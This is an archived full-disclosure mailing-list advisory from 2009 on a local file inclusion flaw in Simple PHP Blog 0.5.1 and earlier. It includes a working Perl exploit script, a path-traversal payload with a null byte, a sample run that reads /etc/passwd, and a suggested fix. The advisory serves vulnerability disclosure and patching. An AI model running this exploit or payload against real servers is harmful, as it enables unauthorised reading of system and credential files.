lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Fri, 18 Dec 2009 13:14:03 +0100 From: ISecAuditors Security Advisories <advisories@...cauditors.com> To: bugs@...uritytracker.com, news@...uriteam.com, full-disclosure@...ts.grok.org.uk, vuln@...unia.com, packet@...ketstormsecurity.org, bugtraq@...urityfocus.com Subject: [ISecAuditors Security Advisories] Simple PHP Blog <= 0.5.1 Local File Include vulnerability ============================================= INTERNET SECURITY AUDITORS ALERT 2009-005 - Original release date: March 2nd, 2009 - Last revised: December 18th, 2009 - Discovered by: Juan Galiana Lara - Severity: 6.8/10 (CVSS scored) ============================================= I. VULNERABILITY ------------------------- Simple PHP Blog <= 0.5.1 Local File Include vulnerability II. BACKGROUND ------------------------- Simple PHP Blog is a blog system does not requires database setup, and is very easy to install. III. DESCRIPTION ------------------------- Simple PHP Blog <= 0.5.1 is affected by a Local File Include vulnerability in 'languages_cgi.php' due to parameter 'blog_language1' is not properly sanitized. IV. PROOF OF CONCEPT ------------------------- The affected code: 62 require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php'); Exploit: #!/usr/bin/perl # Local File Include Exploit # Simple PHP Blog <= 0.5.1 # jgaliana <at> isecauditors=dot=com # Internet Security Auditors use LWP::UserAgent; if ($#ARGV < 3) { die("Usage: $0 <site> <path> <file> <cookie>"); } $ua = LWP::UserAgent->new; $ua->agent("Simple PHP Blog Exploit ^_^"); $ua->default_header('Cookie' => "sid=$ARGV[3]"); my $req = new HTTP::Request POST => "http://$ARGV[0]$ARGV[1]/languages_cgi.php"; $req->content_type('application/x-www-form-urlencoded'); $req->content("blog_language1=../../../../..$ARGV[2]%00"); my $res = $ua->request($req); if ($res->is_success) { print $res->content; } else { print "Error: " .$res->status_line, "\n"; } $ perl simple.pl example.com /blog /etc/passwd <my_cookie_here>|head -1 root:*:0:0:root:/root:/bin/bash The bug can be exploited with or without 'magic_quotes_gpc', but note that if magic_quotes_gpc is set to Off, an attacker can view any file, adding a '\0' character like /etc/passwd, if not only can include php files, allowing to execute any local php files. V. BUSINESS IMPACT ------------------------- The impact is the attacker can read arbitrary files in the context of the webserver and execute arbitrary local php scripts. VI. SYSTEMS AFFECTED ------------------------- Versions prior and including 0.5.1 are affected In order to patch the application the function file_exists() and basename() must be added to the affected code. VII. SOLUTION ------------------------- Change line 62 of languages_cgi.php in order to filter $_POST[ 'blog_language1' ] variable. if (ereg('^[a-zA-Z0-9_]+$', $_POST[ 'blog_language1' ])) require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php'); VIII. REFERENCES ------------------------- http://www.simplephpblog.com http://sourceforge.net/projects/sphpblog/ http://www.isecauditors.com IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com). X. REVISION HISTORY ------------------------- March 02, 2009: Initial release. December 18, 2009: Last revision. XI. DISCLOSURE TIMELINE ------------------------- March 02, 2009: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com) March 03, 2009: Notified to developer. No response. December 13, 2009: Notified again. No response. December 18, 2009: Added mitigation solution and sent to lists. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists